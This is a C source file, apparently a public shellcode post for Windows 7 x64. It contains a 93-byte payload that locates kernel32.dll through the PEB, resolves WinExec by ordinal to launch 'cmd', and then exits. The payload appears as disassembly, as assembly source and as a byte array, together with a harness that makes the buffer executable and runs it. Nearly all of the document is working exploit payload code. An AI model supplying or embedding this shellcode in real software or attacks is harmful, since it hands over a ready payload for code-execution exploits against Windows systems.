/* # Title : Windows x64 WinExec() shellcode # Date : 15-10-2016 # Author : Roziul Hasan Khan Shifat # size : 93 bytes # Tested on : Windows 7 Ultimate x64 */ /* Disassembly of section .text: 0000000000000000 <_start>: 0: 99 cltd 1: 65 48 8b 42 60 mov %gs:0x60(%rdx),%rax 6: 48 8b 40 18 mov 0x18(%rax),%rax a: 48 8b 70 10 mov 0x10(%rax),%rsi e: 48 ad lods %ds:(%rsi),%rax 10: 48 8b 30 mov (%rax),%rsi 13: 48 8b 7e 30 mov 0x30(%rsi),%rdi 17: 48 31 db xor %rbx,%rbx 1a: 48 31 f6 xor %rsi,%rsi 1d: 8b 5f 3c mov 0x3c(%rdi),%ebx 20: 48 01 fb add %rdi,%rbx 23: b2 88 mov $0x88,%dl 25: 8b 1c 13 mov (%rbx,%rdx,1),%ebx 28: 48 01 fb add %rdi,%rbx 2b: 8b 73 1c mov 0x1c(%rbx),%esi 2e: 48 01 fe add %rdi,%rsi 31: 99 cltd 32: 66 ba 27 05 mov $0x527,%dx 36: 8b 04 96 mov (%rsi,%rdx,4),%eax 39: 48 01 f8 add %rdi,%rax 3c: eb 17 jmp 55 000000000000003e : 3e: 59 pop %rcx 3f: 99 cltd 40: 48 ff c2 inc %rdx 43: ff d0 callq *%rax 45: 99 cltd 46: 66 ba 29 01 mov $0x129,%dx 4a: 8b 04 96 mov (%rsi,%rdx,4),%eax 4d: 48 01 f8 add %rdi,%rax 50: 48 31 c9 xor %rcx,%rcx 53: ff d0 callq *%rax 0000000000000055 : 55: e8 e4 ff ff ff callq 3e 5a: 63 6d 64 movslq 0x64(%rbp),%ebp ... */ /* bits 64 section .text global _start _start: cdq mov rax,[gs:rdx+0x60] ;PEB mov rax,[rax+0x18] ;PEB.Ldr mov rsi,[rax+0x10] ;PEB.Ldr->InMemOrderModuleList lodsq mov rsi,[rax] mov rdi,[rsi+0x30] ;kernel32.dll base address xor rbx,rbx xor rsi,rsi mov ebx,[rdi+0x3c] ;elf_anew add rbx,rdi ;PE HEADER mov dl,0x88 mov ebx,[rbx+rdx] ;DataDirectory->VirtualAddress add rbx,rdi ;IMAGE_EXPORT_DIRECTORY mov esi,[rbx+0x1c] ;AddressOfFunctions add rsi,rdi cdq mov dx,1319 ;Ordinal of WinExec() mov eax,[rsi+rdx*4] add rax,rdi ;rax=WinExec() ;WinExec("cmd",1) jmp c exec: pop rcx cdq inc rdx call rax cdq mov dx,297 mov eax,[rsi+rdx*4] add rax,rdi ;rax=FatalExit() ;FatalExit(0) xor rcx,rcx call rax c: call exec db 'cmd',0,0 */ #include #include #include char shellcode[]="\x99\x65\x48\x8b\x42\x60\x48\x8b\x40\x18\x48\x8b\x70\x10\x48\xad\x48\x8b\x30\x48\x8b\x7e\x30\x48\x31\xdb\x48\x31\xf6\x8b\x5f\x3c\x48\x01\xfb\xb2\x88\x8b\x1c\x13\x48\x01\xfb\x8b\x73\x1c\x48\x01\xfe\x99\x66\xba\x27\x05\x8b\x04\x96\x48\x01\xf8\xeb\x17\x59\x99\x48\xff\xc2\xff\xd0\x99\x66\xba\x29\x01\x8b\x04\x96\x48\x01\xf8\x48\x31\xc9\xff\xd0\xe8\xe4\xff\xff\xff\x63\x6d\x64"; main() { int len=strlen(shellcode); DWORD l=0; printf("shellcode length %d bytes\n",len ); VirtualProtect(shellcode,len,PAGE_EXECUTE_READWRITE,&l); (* (int(*)()) shellcode ) (); }